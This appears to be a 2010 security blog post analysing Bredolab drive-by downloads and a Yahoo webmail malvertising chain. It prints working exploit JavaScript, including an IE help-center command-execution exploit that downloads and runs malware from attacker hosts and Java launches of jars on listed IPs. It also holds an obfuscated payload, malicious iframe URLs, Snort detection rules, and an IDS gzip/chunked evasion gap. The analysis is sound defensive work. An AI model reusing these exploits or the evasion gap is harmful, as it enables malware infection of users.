if((document.all)&&(navigator.appVersion.indexOf('MSIE 7.')!=-1)) document.write("<iframe src=\"hcp://services/search?query=&topic=hcp://system/sysinfo /sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape %28 %27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd %2B %252Fc%2Bcd%2B..%252F%2526echo%2Bfunction%2Ba9%2528b6%2529%257BrV__%253Bfor%2528iVb6.length%253Bi%253EV0%253Bi--%2529r%252BVb6.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528a9%2528_%253B%25292%252CJexe.tratsJ%2528%255DJeliJ%25 ?BJFoTevaSJ%255Bo%253B%2529%255DJydoBesnoJ%252BJpserJ%255Bx%2528etirW.o%253B%2529%2528nepO.o%253B1VepyT.o%253B3VedoM.o%253B%2529llun%2528dnes.x%253B%25290%252CJ1Vdip%25261Vdi%253Fphp.emoclew%252F0808%253Aur.eydknup%252F%252F%253AptthJ%252CJTEGJ%2528nepo.x%253B%2529JPTTHLJ%252BJMX.tfosorciMJ%2528a%2BwenVx%253B%2529y%2528a%2BwenVo%253BJmaertS.BDODAJVy%253B%255DJtceJ%252BJjbOXeviJ%252BJtcAJ%255Bsiht%2BV%2Ba_%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252Fq%2B.js%2526start.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FJ%252Fg%252CString.fromCharCode%252834%2529%2529.replace%2528%252FV%252Fg%252CString.fromCharCode%252861%2529%2529.replace%2528%252F_%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2Fscript%3E\"></iframe>");
D6biz750 = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
for(i in D6biz750){
try{
Qcdgcii = new ActiveXObject(D6biz750[i]);
if (Qcdgcii){
Xn51q1 = document.createElement("iframe");
Xn51q1.setAttribute("src", "Notes1.pdf");
document.body.appendChild(Xn51q1);
}
}catch(e){}
}
try{
if (navigator.javaEnabled()){
Efe81htb = docum?nt.createElement("iframe");
Efe81htb.setAttribute("src", "Applet1.html");
document.body.appendChild(Efe81htb);
}
}catch(e){}
try{
if (navigator.javaEnabled()){
var ips = ["174.143.145.234", "184.82.38.68", "198.145.116.71", "207.191.229.166", "207.58.189.133", "212.175.45.245", "68.233.4.27"];
var ip = ips[Math.round(Math.random() * (ips.length-1) )];
var u = "http: -J-jar -J\\\\"+ip+"\\public\\001.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
try {
o.launch(u);
} catch (e) {
n.launch(u);
}
}
}
}catch(e){}
After this JavaScript executes properly in the browser, it then causes the client to download a PDF in the sample we have captured. Once the PDF has been downloaded and the client is vulnerable to it, the client will pull down the executable malware payload. With bredolab sucessfully installed, the client will then call home into the controller. Luckily the great people over at SourceFire’s VRT have had signatures that trigger on these infections and help you clean them up quite easily for a while. The are as follows:
SPECIFIC-THREATS Bredolab downloader communication with server attempt
BACKDOOR rogue software xp police antivirus install-timedetection
The signatures that we have written to detect the drive by’s and redirects to them are as follows. These have been published to the Emerging Threats mailing list a while back, however these are what we run for our client to help us find this stuff. The false positive rates are very low except for the first signature as some people download lists of malicious sites from web servers and that causes that sig to fire. You can easily identify those and get rid of the FP’s with the threshold.conf file in Snort however:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"DRIVEBY bredolab - server response contains .ru:8080/index.php?"; flow:established,to_client; content:".ru:8080/index.php?"; classtype:bad-unknown; sid:5600083; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - cookie: pid=1"; flow:established,to_server; content:"pid=1|0D|"; http_cookie; classtype:bad-unknown; sid:5600084; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - jquery.jxx"; flow:established,to_server; content:"/jquery.jxx?v="; http_uri; classtype:bad-unknown; sid:5600085; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - request to a *.ru:8080 URI"; flow:established,to_server; content:".ru:8080|0D 0A|"; http_header; classtype:bad-unknown; sid:5600086; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"DRIVEBY bredolab - hidden div served by nginx"; flow:established,to_client; content:"Server: nginx"; http_header; content:"<div style=\"visibility: hidden\;\"><"; depth:120; classtype:bad-unknown; sid:5600089; rev:1;)
After getting a bit frustrated a little while ago while attempting to write a signature for some hidden iframe’s that were redirecting clients to drive by sites, I started digging around a bit more and even posted over on the Snort-Users mailing list and found out something a little terrifying from the guys over at SourceFire. Snort (or Suricata for that matter) will not actually gunzip HTTP that is gzip’d if it has been transferred with chunked encoding. Now, you may be thinking to yourself “that’s not true, I totally have my http_inspect configured the way it comes with the VRT rulset downloads and it has gzip and chunked encoding configuration options enabled!”. Well, unfortunately the current logic of the program will dechunk the data and then run the signatures against the dechunked (but still gzip’d) data and then it discards the gzip’d data and moves onto the next packet. One would hope that the logic would be updated to detected if HTTP body is chunked+gzip’d, then dechunk->gunzip->compare against signatures. This will obviously actually allow people to reliably inspect the body of an HTTP response intead of attempting to rely upon only being able to write sigs on the compressed content of the body, however there may be some instances where this is beneficial. The trouble is this is a large amount of traffic and do you want to (or have) the processor cycles to compare the gzip’d data and then the gunzip’d data. Below we will go through the process step by step to demonstrate this issue. Here we have our response packet which you can see is chunked and compressed with gzip (as is indicated in the HTTP headers):
00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 30 .Server: nginx/0
00000020 2e 36 2e 33 39 0d 0a 44 61 74 65 3a 20 4d 6f 6e .6.39..D ate: Mon
00000030 2c 20 31 32 20 4a 75 6c 20 32 30 31 30 20 31 38 , 12 Jul 2010 18
00000040 3a 30 37 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 :07:10 G MT..Cont
00000050 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 ent-Type : text/h
00000060 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
00000070 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d coding: chunked.
00000080 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
00000090 70 2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000000A0 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 31 2e 36 ed-By: P HP/5.1.6
000000B0 0d 0a 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 ..Conten t-Encodi
000000C0 6e 67 3a 20 67 7a 69 70 0d 0a 0d 0a 61 0d 0a 1f ng: gzip ....a...
000000D0 8b 08 00 00 00 00 00 00 03 0d 0a 31 33 30 0d 0a ........ ...130..
000000E0 bd 52 cb 4e c4 30 0c bc ef 57 44 b9 04 24 da 74 .R.N.0.. .WD..$.t
000000F0 d9 07 85 4d 7a 44 82 03 1c e0 07 d2 d6 6d 22 d2 ...MzD.. .....m".
00000100 64 37 75 f7 f1 f7 a4 dd 15 42 20 ae f8 64 8f 3d d7u..... .B ..d.=
00000110 1e 6b 64 a1 b1 b3 85 d0 a0 ea 62 26 3a 40 45 34 .kd..... ..b&:@E4
00000120 e2 36 81 dd 60 f6 92 56 de 21 38 4c f0 b4 05 4a .6..`..V .!8L...J
00000130 2e 95 a4 08 47 e4 23 73 43 2a ad 42 0f 28 9f de ....G.#s C*.B.(..
00000140 5e 93 3c 5f dd 27 73 1a 17 a1 41 0b c5 32 5b 92 ^.<_.'s. ..A..2[.
00000150 17 8f e4 d1 0f ae 16 fc 0c 0a 3e 89 89 d2 d7 27 ........ ..>....'
00000160 52 b6 95 b7 3e 48 7a d0 06 61 64 56 51 0e 42 bc R...>Hz. .adVQ.B.
00000170 68 fe 93 1e 11 c1 2f ed 99 d0 71 e6 52 b8 d6 b8 h...../. ..q.R...
00000180 23 cf d2 75 ba 58 7d 9b e0 a3 42 31 fb ff f8 65 #..u.X}. ..B1...e
00000190 23 0b d0 04 e8 35 fb 72 90 dd 6d 86 60 e5 68 f5 #....5.r ..m.`.h.
000001A0 03 e7 25 58 6b 2a df c3 47 9e 1a d7 78 be cb 7b ..%Xk*.. G...x..{
000001B0 ce 0a d1 57 c1 6c 91 58 e5 da 41 b5 20 e9 b3 da ...W.l.X ..A. ...
000001C0 ab b7 09 a4 05 e9 c1 36 69 e7 f7 f0 ee af 16 d9 .......6 i.......
000001D0 72 7d b3 c8 56 eb eb 0d 11 fc cc 8b 66 9a 26 a8 r}..V... ....f.&.
000001E0 0e 48 1f 2a c9 fe d2 72 b7 96 33 72 30 35 6a c9 .H.*...r ..3r05j.
000001F0 e6 8c 68 30 ad c6 29 9d d8 a5 0f 35 04 c9 b2 78 ..h0..). ...5...x
00000200 10 3f 2f 8c c9 f4 36 9f 04 6b bf 18 3d 02 00 00 .?/...6. .k..=...
00000210 0d 0a 30 0d 0a 0d 0a ..0....
Here we have extract the chunked body of this response (which is still compressed with gzip) and if we look at it at this point, we notice there really isn’t anything in here our sigs are going to fire on. However since the http_inspect preprocessor has dechunked the data to this buffer, it will compare the signatures at this point without gunzip’ing it. Once comparison is complete it is on to the next packet:
0000 1f 8b 08 00 00 00 00 00 00 03 bd 52 cb 4e c4 30 ...........R.N.0
0010 0c bc ef 57 44 b9 04 24 da 74 d9 07 85 4d 7a 44 ...WD..$.t...MzD
0020 82 03 1c e0 07 d2 d6 6d 22 d2 64 37 75 f7 f1 f7 .......m".d7u...
0030 a4 dd 15 42 20 ae f8 64 8f 3d 1e 6b 64 a1 b1 b3 ...B ..d.=.kd...
0040 85 d0 a0 ea 62 26 3a 40 45 34 e2 36 81 dd 60 f6 ....b&:@E4.6..`.
0050 92 56 de 21 38 4c f0 b4 05 4a 2e 95 a4 08 47 e4 .V.!8L...J....G.
0060 23 73 43 2a ad 42 0f 28 9f de 5e 93 3c 5f dd 27 #sC*.B.(..^.<_.'
0070 73 1a 17 a1 41 0b c5 32 5b 92 17 8f e4 d1 0f ae s...A..2[.......
0080 16 fc 0c 0a 3e 89 89 d2 d7 27 52 b6 95 b7 3e 48 ....>....'R...>H
0090 7a d0 06 61 64 56 51 0e 42 bc 68 fe 93 1e 11 c1 z..adVQ.B.h.....
00a0 2f ed 99 d0 71 e6 52 b8 d6 b8 23 cf d2 75 ba 58 /...q.R...#..u.X
00b0 7d 9b e0 a3 42 31 fb ff f8 65 23 0b d0 04 e8 35 }...B1...e#....5
00c0 fb 72 90 dd 6d 86 60 e5 68 f5 03 e7 25 58 6b 2a .r..m.`.h...%Xk*
00d0 df c3 47 9e 1a d7 78 be cb 7b ce 0a d1 57 c1 6c ..G...x..{...W.l
00e0 91 58 e5 da 41 b5 20 e9 b3 da ab b7 09 a4 05 e9 .X..A. .........
00f0 c1 36 69 e7 f7 f0 ee af 16 d9 72 7d b3 c8 56 eb .6i.......r}..V.
0100 eb 0d 11 fc cc 8b 66 9a 26 a8 0e 48 1f 2a c9 fe ......f.&..H.*..
0110 d2 72 b7 96 33 72 30 35 6a c9 e6 8c 68 30 ad c6 .r..3r05j...h0..
0120 29 9d d8 a5 0f 35 04 c9 b2 78 10 3f 2f 8c c9 f4 )....5...x.?/...
0130 36 9f 04 6b bf 18 3d 02 00 00 6..k..=...
However we can gunzip this extracted data, we get the following which has some stuff we are very interested in attempting to signature on, mainly a hidden iframe redirecting a client to a drive by site:
0000 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 <html><head>.<me
0010 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 ta http-equiv="c
0020 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e ontent-type" con
0030 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b tent="text/html;
0040 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 charset=ISO-885
0050 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 9-1">.<title>404
0060 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c Not Found</titl
0070 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 e></head><body b
0080 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a gcolor="white">.
0090 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 <center><h1>404
00a0 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f Not Found</h1></
00b0 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e center>.<hr><cen
00c0 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 36 2e 33 35 ter>nginx/0.6.35
00d0 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 </center>.</body
00e0 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a >...............
00f0 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0100 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0110 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0120 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0130 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0140 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ................
0150 0a 0a 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 ....<meta http-e
0160 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 quiv='refresh' c
0170 6f 6e 74 65 6e 74 3d 27 37 3b 75 72 6c 3d 68 74 ontent='7;url=ht
0180 74 70 3a 2f 2f 62 65 6c 6c 69 63 6f 73 65 6b 38 tp://bellicosek8
0190 2e 69 6e 66 6f 2f 71 38 73 2f 27 3e 3c 73 63 72 .info/q8s/'><scr
01a0 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 ipt language="Ja
01b0 76 61 53 63 72 69 70 74 22 3e 20 73 65 6c 66 2e vaScript"> self.
01c0 6d 6f 76 65 54 6f 28 33 30 34 36 2c 33 30 35 36 moveTo(3046,3056
01d0 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 69 66 ); </script>.<if
01e0 72 61 6d 65 20 73 72 63 3d 27 68 74 74 70 3a 2f rame src='http:/
01f0 2f 62 65 6c 6c 69 63 6f 73 65 6b 38 2e 69 6e 66 /bellicosek8.inf
0200 6f 2f 6e 32 6c 2f 27 20 77 69 64 74 68 3d 27 31 o/n2l/' width='1
0210 27 20 68 65 69 67 68 74 3d 27 31 27 20 66 72 61 ' height='1' fra
0220 6d 65 62 6f 72 64 65 72 3d 27 30 27 3e 3c 2f 69 meborder='0'></i
0230 66 72 61 6d 65 3e 3c 2f 68 74 6d 6c 3e frame></html>
Or the following in just plain old printable HTML output:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title>404 Not Found</title></head><body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.35</center>
</body>
<meta http-equiv='refresh' content='7;url=http://bellicosek8.info/q8s/'><script language="JavaScript"> self.moveTo(3046,3056); </script>
<iframe src='http://bellicosek8.info/n2l/' width='1' height='1' frameborder='0'></iframe></html>
So in testing, we wrote the most simple of signatures looking for just the string “iframe” with our sample PCAP we had. The signature was as follows:
alert tcp any any -> any any (msg:"MALVERTISING hidden iframe served by nginx 2"; content:"iframe"; nocase; classtype:bad-unknown; sid:5600066; rev:1;)
So when we look at the output to the console, we see that we get zero alerts which should not be the case. Below we take a look at the output from Snort regarding http_inspect while we were running against this PCAP we were using for testing purposes. Here we notice something odd, there is a number for “HTTP Response Gzip packets extracted” and also “Gzip Compressed Data Processed” but the value for “Gzip Decompressed Data Processed” is “0.00″.
HTTP Inspect - encodings (Note: stream-reassembled packets included):
POST methods: 0
GET methods: 2
HTTP Request Headers extracted: 2
HTTP Request Cookies extracted: 0
Post parameters extracted: 0
HTTP response Headers extracted: 2
HTTP Response Cookies extracted: 0
Unicode: 0
Double unicode: 0
Non-ASCII representable: 0
Base 36: 0
Directory traversals: 0
Extra slashes ("//"): 0
Self-referencing paths ("./"): 0
HTTP Response Gzip packets extracted: 2
Gzip Compressed Data Processed: 331.00
Gzip Decompressed Data Processed: 0.00
Total packets processed: 4
So it appears that Snort’s http_inspect does indeed identfy and extract the gzip’d packets, however it does not unzip the packet and inspect it if it was transferred via chunked encoding. Below is the section of the snort.conf file regarding http_inspect that was used during testing. This should be the same configuration as you receive from the snort.conf file contained within the VRT ruleset you download from Snort.org. Note that we definately have this configured to decompress, dechunk and inspect gzip’d data (all highlighted in red) and the numbers for each of these variables in the configurations are much much larger than anything we are dealing with in the example PCAP.
preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 20480 decompress_depth 20480
preprocessor http_inspect_server: server default \
chunk_length 500000 \
server_flow_depth 0 \
client_flow_depth 0 \
post_depth 65495 \
oversize_dir_length 500 \
max_header_length 750 \
max_headers 100 \
ports { 80 1220 2301 3128 7777 7779 8000 8008 8028 8080 8180 8888 9999 }\
non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \
enable_cookie \
extended_response_inspection \
inspect_gzip \
apache_whitespace no \
ascii no \
bare_byte no \
directory no \
double_decode no \
iis_backslash no \
iis_delimiter no \
iis_unicode no \
multi_slash no \
non_strict \
u_encode yes \
webroot no
Unfortunately, quite a bit of gzip’d content is transmitted over chunked encoding. This is due to the fact that chunked encoding is used when the content length of the data being sent to the client from the server is unknown. Generally when you are compressing data on the fly to deliver to a client the webserver will end up using this method since it can’t compute how large the response is going to be until after it has already started sending data back to the client. Hopefully functionality will be added to remedy the inability to inspect these types of HTTP responses, because this is currently being leveraged to evade IDS quite frequently by many different types of FakeAV, drive by and malvertising sites in the wild.
Below we have a user whom has done something millions upon millions of people do every day, login to their Yahoo! webmail. However, this time around Yahoo! is going to let someone they have a business relationship with attempt to exploit them and deliver malicious software into their computer. Upon visiting the site, Yahoo! will cause the client to make the following request to a malvertising server (c3metrics.net). Please note that the referer in the below request is a web service that routes the client to the advertisement to display to the clients logging in to the Yahoo! webmail service, if you directly visit it and read the JavaScript comments you can validate this:
GET /jsc/fm.js?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: c3metrics.net
Connection: Keep-Alive
The response to this request will be an HTTP 301 status code that will cause a redirect from the above URI to the below, they are nearly identical except for a single backslash between the fm.js and the ?n:
HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Content-Length: 185
Location: http://c3metrics.net/jsc/fm.js/?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z=
Connection: keep-alive
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.8.45</center>
</body>
</html>
Now the user is following the redirected URI it received:
Request:
GET /jsc/fm.js/?n=162&c=24/1&d=14&s=23&w=1&h=1&nc=1275511688&l=&z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: c3metrics.net
Connection: Keep-Alive
However, this time around the malvertising server is going to serve the client some JavaScript that is obfuscated in order to escape detection or analysis by various types of network based network security tools (IDS,IPS, etc):
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3572
var _MlgYp=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var RUOR=this;var JXzn_=RUOR [_MlgYp];var CVXMF_s=new String('unescape');var uhbnP=RUOR [CVXMF_s];var IBpC='PrMPdkPd=PJOPd=PJ/PJkPd=PJgPJsParPkgParPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/ParPagParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPdkPdiPJaPdkPd=PdaPJ/PJqPJdPa2PkrPasParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPJsPJOPdkPd=P=/PJqPJ=PJiPd2P=3PJJPa2PaaParPaaPa/PagPkOPa/Pa/Pa/ParPa3ParPa2PkOPkrPkrPkrParPaMParPkJPkrParPaMParPkJPkrPa/PkmPrMPrMPdJPJOPdaParPJOPJsPJsPi3Pd=ParPkgParPaaPkOPasPkaPasPkkPasPk=PasPkiPasPkJPasPkdPasPk2PasPk/PaaPkmPrMPdJPJOPdaParPJgPd=PJkPJ2ParPkgParPJOPJsPJsPi3Pd=PaqPJgPJOPd=PJkPJ2Pa2PdkPd=PJOPd=PJ/PJkPd=PJgPJsPa/PkmPrMPrMPrMPrMPJ/PJJParPa2ParPJgPd=PJkPJ2ParPaOPkgParPJqPdiPJsPJsParPa/ParPdmPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3Pd=PaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PaJPdkPkgPkrPaJPJiPkgPkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkrPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkrPadParParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPdgParParPJiPJsPdkPJiParParPdmPrMPrMPr/Pr/PrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PddPJ/PJsPdkPd=PJ3PdkPJiPaqPJkPJ3PaqPJkPJkPa3PdMPJgPd=PdaPJkPaqPdrPJ2PdrPk3PdrPdOPkgPJkPdiPdkPd=PkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmParPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3PJMPdkPi3PJiPaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrMPdgPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJOParPJ2PdaPJiPJJPkgPadPJ2Pd=Pd=PdrPaiPkkP=OPaiPkaP=JPaiPkaP=JPd=PdaPJOPJkPJmPJ/PJqPJdPaqPJkPJ3PJgPadParPd=PJOPdaPJdPJiPd=PkgPadPi3PJaPJsPJOPJqPJmPadPaiPkkP=iPaiPkkP=kPJ/PJgPJdParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PJaPJ=PJaPa3PdrPJ/Pd2PJiPJsPaqPJdPJ/PJJPadParPJaPJ3PdaPJ=PJiPdaPkgPadPkrPadParPaiPkkP=iPaiPkkP=kPa3PJOPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrM';var jlgkds='C9H6fshixZO4/NBSIeX:=PapknRrc1D0vM3A.T&gQGJ82K?t7yYVbu_-Wwqo%jUmElLdzF5';var GaJhym='s/0JF%4zlEe=Y5mVTxIK6wuDjQ-t?OgrASkMfhB9.Xn2avo:dGL&HWU7cyR1PC_bqN8Zp3i';var _jNcLS='';var TOZI;var DdC;for(TOZI=0;TOZI<IBpC.length;TOZI++){ DdC=GaJhym.indexOf(IBpC.charAt(TOZI));if(DdC>-1){ _jNcLS+=jlgkds.charAt(DdC);}}JXzn_(uhbnP(_jNcLS));
Now this JavaScript does just look like a lot of junk, but it is pretty easy to deobfuscate it using tools like the FireFox FireBug extention or great online tools like JSUnpack. We have submitted the following JavaScript to JSUnpack and the report can be viewed here:
http://jsunpack.jeek.org/dec/go?report=7bff4237dbcb5448c08c5c3b40f4c1d0a97c889b
The output we are concerned with about this report is write here, this is what ends up being written into the HTML document. Please do not go to the below URL’s unless you are attempting to perform research within your sandboxes or sacrificial lambs:
<iframe src='http://wilstose.co.cc/zmtrc.php?pq=cust1' style='visibility:hidden;' width='1' height='1'></iframe>
<iframe src='http://c3metrics.net/stats_js_e.php?id=<REMOVED>' style='visibility:hidden;' width='1' height='1'></iframe>
<a href='http://tracking.com' target='_blank'><img src='http://c3metrics.net/bdb/pixel.gif' border='0'></a>
Now, at this point the client will perform requests to the URI’s in the two IFRAME’s along with the gif. First we will look at the request to the stats_js_e.php file which is purely used for tracking purposes. The id= variable that is passed to it is a simple UNIX timestamp. We have removed it from our examples here (but it is obviously still available in the jsunpack report if you care to see it).
GET /stats_js_e.php?id=<REMOVED> HTTP/1.1
